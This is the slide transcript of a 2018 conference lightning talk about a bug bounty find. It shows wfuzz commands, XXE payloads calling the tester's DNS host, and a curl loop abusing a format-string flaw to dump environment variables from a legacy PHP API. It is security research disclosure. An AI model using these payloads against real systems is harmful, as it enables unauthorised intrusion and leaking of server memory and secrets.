Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web based format injection, dumping memory like...

Sponsored · Your Podcast. Everywhere. Effortlessly. Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
Avatar for Frans Rosén Frans Rosén
September 19, 2018
Research
0
200

Web based format injection, dumping memory like it's 99 (or "Please help")

My lightning talk from Sec-T Stockholm in September 2018.

Avatar for Frans Rosén

Frans Rosén

September 19, 2018
Tweet

More Decks by Frans Rosén

See All by Frans Rosén
X-Correlation Injections (or How to break server-side contexts)
Avatar for Frans Rosén fransrosen
0
2k
Story of a RCE on Apple through hot jar swapping
Avatar for Frans Rosén fransrosen
0
1.3k
Account hijacking using "dirty dancing" in sign-in OAuth-flows
Avatar for Frans Rosén fransrosen
0
380
A methodology using fuzzing and info disclosure
Avatar for Frans Rosén fransrosen
0
450
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Avatar for Frans Rosén fransrosen
3
9.7k
A story of the passive aggressive sysadmin of AEM
Avatar for Frans Rosén fransrosen
0
8.7k
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
Avatar for Frans Rosén fransrosen
3
7.8k

Other Decks in Research

See All in Research
An Open and Reproducible Deep Research Agent for Long-Form Question Answering
Avatar for Ikuya Yamada ikuyamada
0
350
【SIGGRAPH Asia 2025】Lo-Fi Photograph with Lo-Fi Communication
Avatar for Chinatsu Ozawa toremolo72
0
130
離散凸解析に基づく予測付き離散最適化手法 (IBIS '25)
Avatar for Taihei OKI taihei_oki
1
730
Φ-Sat-2のAutoEncoderによる情報圧縮系論文
Avatar for SatAI.challenge satai
3
140
明日から使える!研究効率化ツール入門
Avatar for Yusuke Matsui matsui_528
9
5.1k
AIを叩き台として、 「検証」から「共創」へと進化するリサーチ
Avatar for めーら/Miki mela_dayo
0
150
生成的情報検索時代におけるAI利用と認知バイアス
Avatar for Y. Yamamoto trycycle
PRO
0
390
湯村研究室の紹介2025 / yumulab2025
Avatar for yumulab yumulab
0
320
LLM-jp-3 and beyond: Training Large Language Models
Avatar for Yusuke Oda odashi
1
780
[チュートリアル] 電波マップ構築入門 :研究動向と課題設定の勘所
Avatar for Koya SATO k_sato
0
340
大規模言語モデルにおけるData-Centric AIと合成データの活用 / Data-Centric AI and Synthetic Data in Large Language Models
Avatar for tsurubee tsurubee
1
530
2026年1月の生成AI領域の重要リリース&トピック解説
Avatar for KAJI | 梶谷健人 kajikent
0
830

Featured

See All Featured
Public Speaking Without Barfing On Your Shoes - THAT 2023
Avatar for David Neal reverentgeek
1
340
Data-driven link building: lessons from a $708K investment (BrightonSEO talk)
Avatar for Szymon Słowik szymonslowik
1
980
Typedesign – Prime Four
Avatar for Hannes Fritz hannesfritz
42
3k
Mobile First: as difficult as doing things right
Avatar for Swwweet swwweet
225
10k
What's in a price? How to price your products and services
Avatar for Michael Herold michaelherold
247
13k
VelocityConf: Rendering Performance Case Studies
Avatar for Addy Osmani addyosmani
333
24k
Game over? The fight for quality and originality in the time of robots
Avatar for Wayne Barker wayneb77
1
140
How to Build an AI Search Optimization Roadmap - Criteria and Steps to Take #SEOIRL
Avatar for Aleyda Solis aleyda
1
2k
Imperfection Machines: The Place of Print at Facebook
Avatar for Scott Boms scottboms
269
14k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
Avatar for Vitaly Friedman smashingmag
254
22k
How to make the Groovebox
Avatar for あそなす asonas
2
2k
Fireside Chat
Avatar for paigeccino paigeccino
42
3.8k

Transcript

  1. @fransrosen Web based format injection, dumping memory like it's 99

    or "Please help"

  2. @fransrosen Public Bug Bounty

  3. @fransrosen RCE is 30,000 USD

  4. @fransrosen Methodology • Found a domain not like the other

    ones

  5. @fransrosen Methodology • Found a domain not like the other

    ones • Legacy on-premise PHP-app acquired by a huge tech organization

  6. @fransrosen Methodology • Found a domain not like the other

    ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available

  7. @fransrosen Methodology • Found a domain not like the other

    ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available 👍 👍 👍

  8. @fransrosen Methodology • Google + GitHub etc

  9. @fransrosen Methodology • Google + GitHub etc

  10. @fransrosen Methodology • Google + GitHub etc

  11. @fransrosen Methodology • Google + GitHub etc

  12. @fransrosen Methodology • Google + GitHub etc • wfuzz!

  13. @fransrosen Methodology • Google + GitHub etc • wfuzz! Interesting

    path: /cgi-bin/default/

  14. @fransrosen Methodology • Google + GitHub etc • wfuzz! python

    wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \
 -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/FUZZ

  15. @fransrosen Methodology • Google + GitHub etc • wfuzz!

  16. @fransrosen Methodology • Google + GitHub etc • wfuzz! /cgi-bin/default/php/

  17. @fransrosen Methodology • Google + GitHub etc • wfuzz! python

    wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \
 -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/php/FUZZ

  18. @fransrosen Methodology • Google + GitHub etc • wfuzz!

  19. @fransrosen xml_api?

  20. @fransrosen xml_api?

  21. @fransrosen xml_api? YEAH! 👍

  22. @fransrosen wtf!?

  23. @fransrosen XXE!

  24. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">

  25. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">

  26. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  27. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  28. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>

    <Envelope><Body><exec><transaction>&exl;</transaction>
 </exec></Body></Envelope>

  29. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>

    <Envelope><Body><exec><transaction>&exl;</transaction>
 </exec></Body></Envelope>

  30. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  31. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  32. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> ???

  33. @fransrosen

  34. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  35. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  36. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  37. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  38. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> WOAH.

  39. @fransrosen Format String Injection?

  40. @fransrosen Format String Injection ON ZE WEB?

  41. @fransrosen Format String Injection http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf

  42. @fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM

    "%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  43. @fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM

    "%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  44. @fransrosen I can’t handle this shit

  45. @fransrosen Help me, zetatwo

  46. @fransrosen Help me, zetatwo

  47. @fransrosen Help me, zetatwo

  48. @fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY

    exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  49. @fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY

    exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  50. @fransrosen Limitations 0x20-0xFF (no 0x22)

  51. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  52. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  53. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  54. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  55. @fransrosen We can read all ENVs for i in $(seq

    8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]>
 <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'

  56. @fransrosen We can read all ENVs for i in $(seq

    8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]>
 <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'

  57. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

  58. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

  59. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

  60. @fransrosen Want to collaborate? @fransrosen

  61. @fransrosen Questions? Suggestions?